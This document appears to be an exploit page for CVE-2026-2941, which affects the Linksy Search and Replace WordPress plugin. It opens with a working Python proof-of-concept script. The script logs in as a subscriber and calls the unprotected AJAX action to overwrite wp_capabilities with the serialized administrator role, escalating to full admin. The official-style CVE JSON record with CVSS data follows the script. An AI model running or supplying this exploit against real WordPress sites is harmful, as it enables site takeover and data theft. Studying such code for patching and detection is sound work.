CVE-2026-2941

import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" username = "subscriber" password = "password" attacker_user_id = 2 # Replace with the actual user ID of the attacker # 1. Authenticate to obtain a session cookie session = requests.Session() login_payload = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': 'http://example.com/wp-admin' } session.post("http://example.com/wp-login.php", data=login_payload) # 2. Exploit the vulnerability to update wp_capabilities # The vulnerability allows updating any table. We target wp_usermeta to escalate privileges. exploit_payload = { 'action': 'linksy_search_and_replace_item_details', # The vulnerable AJAX action 'table_name': 'wp_usermeta', 'primary_key': 'user_id', 'primary_key_value': attacker_user_id, 'field_name': 'meta_key', # Targeting the capability key 'field_value': 'wp_capabilities', # Serialized data for Administrator role 'new_value': 'a:1:{s:13:"administrator";b:1;}' } try: response = session.post(target_url, data=exploit_payload) if response.status_code == 200: print("[+] Request sent successfully. Attempting privilege escalation...") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-2941", "sourceIdentifier": "[email protected]", "published": "2026-03-21T04:17:13.620", "lastModified": "2026-04-24T16:27:44.277", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Linksy Search and Replace plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'linksy_search_and_replace_item_details' function in all versions up to, and including, 1.0.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to update any database table, any value, including the wp_capabilities database field, which allows attackers to change their own role to administrator, which leads to privilege escalation."}, {"lang": "es", "value": "El plugin Linksy Search and Replace para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en la función 'linksy_search_and_replace_item_details' en todas las versiones hasta la 1.0.4, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel de suscriptor y superior, actualicen cualquier tabla de base de datos, cualquier valor, incluyendo el campo de base de datos wp_capabilities, lo que permite a los atacantes cambiar su propio rol a administrador, lo que lleva a la escalada de privilegios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/linksy-search-and-replace/tags/1.0.4/inc/Admin/Partials/SearchAndReplace/AjaxActions.php#L197", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0bf117e2-9e59-4028-b77f-7fce2e7174f3?source=cve", "source": "[email protected]"}]}}